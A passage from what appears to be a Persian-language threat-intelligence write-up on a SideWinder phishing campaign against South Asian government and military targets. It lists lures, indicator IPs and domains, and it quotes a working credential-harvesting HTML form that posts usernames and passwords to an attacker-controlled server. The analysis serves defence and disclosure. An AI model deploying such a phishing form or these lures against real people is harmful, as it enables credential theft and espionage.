* سرعت عملیاتی بالا : این گروه قادر است به‌سرعت دامنه‌های فیشینگ خود را تغییر دهد. طبق گزارش، هر سه تا پنج روز یک سایت جدید ایجاد می‌شود که این موضوع شناسایی و مسدودسازی آن‌ها را دشوار می‌کند.

2. روش فریب و طعمه‌ها:

* این گروه از اسناد با مضامین دریایی و دفاعی به‌عنوان طعمه برای فریب قربانیان استفاده می‌کند.

* نمونه‌های مشخص:

* در بنگلادش، وب‌سایت اداره کل خریدهای دفاعی (DGDP) جعل شده و پورتال‌هایی با عنوان "Secured File" ایجاد گردیده که از قربانیان می‌خواهد برای دسترسی به جزئیات تجهیزات دفاعی ترکیه، اطلاعات ورود ایمیل خود را وارد کنند.

* در نپال، کارمندان وزارت دارایی ایمیل‌هایی حاوی یک فایل PDF فریبنده با عنوان सम्माननीय प्रधानमन्त्रीज्यूको चीन भ्रमण सम्बन्धमा.pdf (در خصوص سفر نخست‌وزیر محترم به چین) دریافت کرده‌اند که آن‌ها را به یک صفحه لاگین جعلی Outlook در بستر Netlify (با آدرس IP: 98.84.224.111 ) هدایت می‌کند.

3. مکانیزم سرقت اطلاعات:

* برخلاف بسیاری از حملات که متکی بر پی‌لودهای بدافزاری سمت کلاینت هستند، این کمپین مستقیماً از طریق فرم‌های HTML اطلاعات را جمع‌آوری می‌کند.

* یک فرم HTML ساده، اطلاعات وارد شده (نام کاربری و رمز عبور) را از طریق یک درخواست POST به سرور تحت کنترل مهاجم ارسال می‌کند. نمونه‌ای از این کد برای هدف قرار دادن SUPARCO (سازمان تحقیقات فضایی و جوی پاکستان) مشاهده شده است:

        <form method="POST" action="https://technologysupport.help/1pac.php">
          <input type="hidden" name="inbox" value="Y2hhaXJtYW5Ad2FwYXJjby5nb3YucGs=">
          <label for="email">Email:</label>
          <input type="email" id="email" name="user_email" required>
          <label for="pass">Password:</label>
          <input type="password" id="pass" name="user_pass" required>
          <button type="submit">Sign In</button>
        </form>
        

* تحلیل کد:

* یک فیلد مخفی (hidden ) با نام inbox در فرم وجود دارد که مقدار آن یک آدرس ایمیل رمزنگاری‌شده با Base64 است Y2hhaXJtYW5Ad2FwYXJjby5nb3YucGs= که معادل chairman@waparco.gov.pk است. این تکنیک به مهاجمان اجازه می‌دهد تا اطلاعات سرقت‌شده را با کمپین‌های خاص خود مرتبط سازند.

* اطلاعات مستقیماً به آدرس https://technologysupport.help/1pac.php ارسال می‌شود.

4. تکنیک‌های تکمیلی و پنهان‌سازی:

* در برخی موارد، از کدهای JavaScript برای افزایش پیچیدگی حمله استفاده می‌شود. برای مثال، آدرس ایمیل قربانی قبل از ارسال به صفحه فیشینگ ثانویه، با Base64 کدگذاری می‌شود. این کار هم به ردیابی نشست‌ها (Session Tracking) کمک می‌کند و هم تحلیل‌های سطحی و سریع را با چالش مواجه می‌سازد.

* پس از ارسال اطلاعات، ممکن است یک پیغام reload به کاربر نمایش داده شود تا در صورت ورود اطلاعات اشتباه، مجدداً آن‌ها را وارد کند.

اهداف و گستره جغرافیایی

این کمپین به‌طور خاص بر روی سازمان‌های دولتی و نظامی در کشورهای جنوب آسیا متمرکز است، از جمله:

* پاکستان
* نپال
* سریلانکا
* بنگلادش
* میانمار

مراحل پس از بهره‌برداری

اطلاعات سرقت‌شده در فرآیندهای جاسوسی گسترده‌تر این گروه مورد استفاده قرار می‌گیرد. این اطلاعات به SideWinder اجازه می‌دهد تا به شبکه‌های محدودشده دسترسی پیدا کند یا در مراحل بعدی، بدافزارهای خود را از دایرکتوری‌های باز روی سرورهای خود مانند IPهای 47.236.177.123 و 31.14.142.50 مستقر کند.


@NullError_ir